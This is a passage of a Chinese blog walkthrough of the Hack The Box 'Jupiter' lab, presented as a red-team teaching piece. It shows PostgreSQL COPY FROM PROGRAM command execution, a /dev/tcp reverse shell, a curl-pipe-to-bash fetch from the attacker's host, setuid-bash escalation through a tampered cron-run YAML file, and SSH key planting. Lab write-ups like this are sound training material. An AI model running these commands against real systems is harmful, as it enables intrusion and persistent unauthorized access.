<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE IF EXISTS cmd_exec;1</span><br><span class="line">CREATE TABLE cmd_exec(cmd_output text);</span><br><span class="line">COPY cmd_exec FROM PROGRAM <span class="string">&#x27;id&#x27;</span>;</span><br><span class="line">SELECT * FROM cmd_exec;</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-158.png" alt="img"></p>
<p>可以看到，执行完最后一条指令后，成功返回执行结果</p>
<p>那么接下来就好办了，我们将”id“改为反弹shell的命令”&#x2F;bin&#x2F;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;10.10.14.50&#x2F;4444 0&gt;&amp;1“，就可以拿到用户系统的shell了</p>
<p>重新执行一遍语句，在写入命令的时候，报错了</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-159.png" alt="img"></p>
<p>可能是特殊字符的问题，所以我们在本地写一个sh脚本，然后让目标通过curl下载执行就可以了</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-160.png" alt="img"></p>
<p>起一个http服务</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-161.png" alt="img"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">替换为以下命令：</span><br><span class="line">curl http://10.10.14.50:5555/shell.sh|bash</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-162.png" alt="img"></p>
<p>发完出这个数据包，监听端口就接到了反弹shell</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-163.png" alt="img"></p>
<h1 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h1><p>可以发现在home目录下有两个用户目录，所以想要拿到flag，还需要提权</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-164.png" alt="img"></p>
<h3 id="postgres用户—-juno用户"><a href="#postgres用户—-juno用户" class="headerlink" title="postgres用户—&gt;juno用户"></a>postgres用户—&gt;juno用户</h3><h5 id="主机信息收集"><a href="#主机信息收集" class="headerlink" title="主机信息收集"></a>主机信息收集</h5><p>主机信息收集我一般都是直接上linpeas和pspy配合着来，当然也可以用其他的工具</p>
<p>同样通过本地的http服务让目标通过wget下载好两个工具，chmod给执行权限，分别运行</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-165.png" alt="img"></p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-166.png" alt="img"></p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-167.png" alt="img"></p>
<p>在linpeas中暂时没有发现能利用的点，而在pspy中，可以看到用户juno（uid&#x3D;1000）在有规律的执行一些命令，猜测可能是定时任务</p>
<p>（注：如果系统不存在通用的提权漏洞，那我们就可以想办法借助目标用户的定时任务，通过修改文件等操作，让用户的定时任务执行时带上我们的恶意命令，以达到修改权限的目的）</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-168.png" alt="img"></p>
<h5 id="定时任务提权"><a href="#定时任务提权" class="headerlink" title="定时任务提权"></a>定时任务提权</h5><p>我们借助gpt来帮助我们分析一下</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-169.png" alt="img"></p>
<p>而所涉及文件中我们只能查看shadow命令执行的&#x2F;dev&#x2F;shm&#x2F;network-simulation.yml这个文件</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-170.png" alt="img"></p>
<p>同样拿去gpt分析</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-171.png" alt="img"></p>
<p>大概意思是是一个启动web服务模拟网络通信的脚本，而且在path和arg处可以执行带参数的命令，如果能改成chmod u+s &#x2F;bin&#x2F;bash，就可以成功借助定时任务提权</p>
<p>所以我想直接修改一个path，然后上传覆盖掉原本的yaml脚本</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-172.png" alt="img"></p>
<p>而我在pspy64上看到它并没有执行成功，只执行了上面的python命令</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-173.png" alt="img"></p>
<p>所以得换一个思路</p>
<p>这里也是通过查看大佬的思路发现可以利用cp命令将&#x2F;bin&#x2F;bash移出来（其实我不也太理解为啥直接操作&#x2F;bin&#x2F;bash不行）</p>
<p>改完后是这样的</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-174.png" alt="img"></p>
<p>上传覆盖，然后pspy64观察进程</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-175.png" alt="img"></p>
<p>两个都成功执行了</p>
<p>然后执行命令提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/tmp/bash -p</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-176.png" alt="img"></p>
<p>可以看到，成功提权进入&#x2F;home&#x2F;juno（postpres用户进不去），但是还是没有访问flag的权限，所以我们得想办法通过ssh进去才行，这里我们有了进入&#x2F;home&#x2F;juno目录的权限，可以尝试ssh公钥写入</p>
<h5 id="ssh公钥写入"><a href="#ssh公钥写入" class="headerlink" title="ssh公钥写入"></a>ssh公钥写入</h5><p>先在本地生成公私钥</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -f ydj</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-177.png" alt="img"></p>
<p>回到目标，用python的pty生成一个好看一点的shell，然后重新执行一遍&#x2F;tmp&#x2F;bash -p命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">&quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;)&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-178.png" alt="img"></p>
<p>从本地下载公钥，cp到.ssh&#x2F;authorized_keys</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-179.png" alt="img"></p>
<p>然后本地ssh私钥连接</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-180.png" alt="img"></p>
<p>成功登录拿到flag</p>
<p>（篇幅有限，后面的juno—&gt;jovian，jovian—&gt;root就先不讲了，也不是今天的重点）</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>总的来说，红队的攻击手法还是数不胜数的，但是终究离不开三板斧：信息收集、外网打点、内网横向。（该HTB靶场没有内网环境，就不做内网横向演示了）所以我们可以以这三个点为基础，然后不断扩展自己的知识面，争取早日成为一个可以独当一面的红队大佬！！！</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/HTB/" rel="tag"># HTB</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/11/06/preg-replace%E5%87%BD%E6%95%B0%E5%9C%A8-e%E4%BF%AE%E9%A5%B0%E7%AC%A6%E4%B8%8B%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="prev" title="preg_replace函数在/e修饰符下的代码执行漏洞">
      <i class="fa fa-chevron-left"></i> preg_replace函数在/e修饰符下的代码执行漏洞
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/11/06/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8B%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/" rel="next" title="PHP反序列化之字符逃逸">
      PHP反序列化之字符逃逸 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="disqus_thread">
      <noscript>Please enable JavaScript to view the comments powered by Disqus.</noscript>
    </div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A4%96%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">外网信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%EF%BC%88nmap%EF%BC%89"><span class="nav-number">1.0.1.</span> <span class="nav-text">端口扫描（nmap）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%90%E5%9F%9F%E5%90%8D%E7%88%86%E7%A0%B4%EF%BC%88gobuster%EF%BC%89"><span class="nav-number">1.0.2.</span> <span class="nav-text">子域名爆破（gobuster）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB%EF%BC%88whatweb%EF%BC%89"><span class="nav-number">1.0.3.</span> <span class="nav-text">指纹识别（whatweb）</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Web%E6%89%93%E7%82%B9"><span class="nav-number">2.</span> <span class="nav-text">Web打点</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Grafana"><span class="nav-number">2.0.1.</span> <span class="nav-text">Grafana</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PostgresSQL%E6%B3%A8%E5%85%A5%E5%88%B0RCE"><span class="nav-number">2.0.2.</span> <span class="nav-text">PostgresSQL注入到RCE</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">3.</span> <span class="nav-text">权限提升</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#postgres%E7%94%A8%E6%88%B7%E2%80%94-juno%E7%94%A8%E6%88%B7"><span class="nav-number">3.0.1.</span> <span class="nav-text">postgres用户—&gt;juno用户</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">3.0.1.0.1.</span> <span class="nav-text">主机信息收集</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="nav-number">3.0.1.0.2.</span> <span class="nav-text">定时任务提权</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ssh%E5%85%AC%E9%92%A5%E5%86%99%E5%85%A5"><span class="nav-number">3.0.1.0.3.</span> <span class="nav-text">ssh公钥写入</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="YDJ"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">YDJ</p>
  <div class="site-description" itemprop="description">我这一生，如履薄冰</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">发布</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">YDJ</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">22k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:12</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script>
  function loadCount() {
    var d = document, s = d.createElement('script');
    s.src = 'https://ydja.disqus.com/count.js';
    s.id = 'dsq-count-scr';
    (d.head || d.body).appendChild(s);
  }
  // defer loading until the whole page loading is completed
  window.addEventListener('load', loadCount, false);
</script>
<script>
  var disqus_config = function() {
    this.page.url = "http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/";
    this.page.identifier = "2023/11/06/一个靶场（HTB-Jupiter）带你了解红队打点思路/";
    this.page.title = "一个靶场（HTB-Jupiter）带你了解红队打点思路";
    };
  NexT.utils.loadComments(document.querySelector('#disqus_thread'), () => {
    if (window.DISQUS) {
      DISQUS.reset({
        reload: true,
        config: disqus_config
      });
    } else {
      var d = document, s = d.createElement('script');
      s.src = 'https://ydja.disqus.com/embed.js';
      s.setAttribute('data-timestamp', '' + +new Date());
      (d.head || d.body).appendChild(s);
    }
  });
</script>

</body>
</html>
